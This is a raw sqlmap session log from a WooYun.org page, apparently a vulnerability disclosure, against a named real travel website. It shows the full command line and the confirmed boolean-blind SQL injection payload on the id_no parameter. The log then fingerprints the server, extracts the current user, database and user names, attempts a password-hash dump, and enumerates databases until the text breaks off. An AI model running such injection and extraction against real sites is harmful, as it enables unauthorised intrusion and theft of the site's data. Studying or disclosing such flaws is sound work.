WooYun.org

[root@Hacker~]# Sqlmap Sqlmap sqlmap.py -u "http://www.mellowtour.com.tw/webobj/
NewPost/ShowPost.asp?id_no=9768&postClass=1" --dbs --passwords --current-user --
current-db --is-dba
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:58:13
[07:58:14] [INFO] testing connection to the target URL
[07:58:14] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[07:58:15] [INFO] target URL is stable
[07:58:15] [INFO] testing if GET parameter 'id_no' is dynamic
[07:58:16] [INFO] confirming that GET parameter 'id_no' is dynamic
[07:58:21] [WARNING] GET parameter 'id_no' does not appear dynamic
[07:58:22] [WARNING] heuristic (basic) test shows that GET parameter 'id_no' mig
ht not be injectable
[07:58:22] [INFO] testing for SQL injection on GET parameter 'id_no'
[07:58:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:58:23] [INFO] GET parameter 'id_no' is 'AND boolean-based blind - WHERE or H
AVING clause' injectable
[07:58:31] [INFO] heuristic (extended) test shows that the back-end DBMS could b
e 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1)? [Y/n] Y
[07:58:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[07:58:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:58:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[07:58:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[07:59:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[07:59:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[07:59:07] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[07:59:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[07:59:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[07:59:55] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[08:00:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:00:20] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[08:00:29] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[08:00:30] [INFO] testing 'MySQL inline queries'
[08:00:30] [INFO] testing 'PostgreSQL inline queries'
[08:00:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:00:30] [INFO] testing 'Oracle inline queries'
[08:00:30] [INFO] testing 'SQLite inline queries'
[08:00:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:00:31] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[08:00:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:00:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:00:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:00:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:00:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:00:44] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[08:01:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:01:05] [WARNING] most probably web server instance hasn't recovered yet from
 previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. '--flush-session --tec
hnique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec
=2')
[08:01:10] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[08:01:10] [INFO] testing 'Oracle AND time-based blind'
[08:01:10] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query)'
[08:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace'
[08:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace (heavy queries)'
[08:01:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:01:41] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[08:02:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:02:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:02:29] [INFO] checking if the injection point on GET parameter 'id_no' is a
false positive
GET parameter 'id_no' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 86 HTTP(s) requ
ests:
---
Place: GET
Parameter: id_no
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id_no=9768 AND 3961=3961&postClass=1
---
[08:17:59] [INFO] testing MySQL
[08:17:59] [WARNING] the back-end DBMS is not MySQL
[08:17:59] [INFO] testing Oracle
[08:17:59] [WARNING] the back-end DBMS is not Oracle
[08:17:59] [INFO] testing PostgreSQL
[08:18:00] [WARNING] the back-end DBMS is not PostgreSQL
[08:18:00] [INFO] testing Microsoft SQL Server
[08:18:00] [INFO] confirming Microsoft SQL Server
[08:18:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[08:18:13] [INFO] fetching current user
[08:18:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[08:18:13] [INFO] retrieved: travel104
current user:    'travel104'
[08:19:25] [INFO] fetching current database
[08:19:25] [INFO] retrieved: BuyS
[08:20:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
ma
[08:20:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
r
[08:21:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:21:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:22:25] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:22:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
t
[08:23:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:24:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
current database:    'BuySmart'
[08:24:18] [INFO] testing if current user is DBA
[08:24:18] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[08:24:18] [INFO] fetching database users password hashes
[08:24:18] [INFO] fetching database users
[08:24:18] [INFO] fetching number of database users
[08:24:18] [INFO] retrieved:
[08:24:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
2
[08:24:42] [INFO] retrieved: sa
[08:25:15] [INFO] retrieved: travel10
[08:26:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:26:51] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
4
[08:27:06] [INFO] fetching number of password hashes for user 'sa'
[08:27:06] [INFO] retrieved:
[08:27:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
0
[08:27:39] [WARNING] unable to retrieve the number of password hashes for user '
sa'
[08:27:39] [INFO] fetching number of password hashes for user 'travel104'
[08:27:39] [INFO] retrieved: 0
[08:27:44] [WARNING] unable to retrieve the number of password hashes for user '
travel104'
[08:27:44] [ERROR] unable to retrieve the password hashes for the database users
 (most probably because the session user has no read privileges over the relevan
t system database table)
[08:27:44] [INFO] fetching database names
[08:27:44] [INFO] fetching number of databases
[08:27:44] [INFO] retrieved: 13
[08:27:59] [INFO] retrieved: 931.tra
[08:29:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
velnet.co
[08:31:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
m.tw
[08:31:38] [INFO] retrieved: AirChina
[08:32:24] [INFO] retrieved: BuySma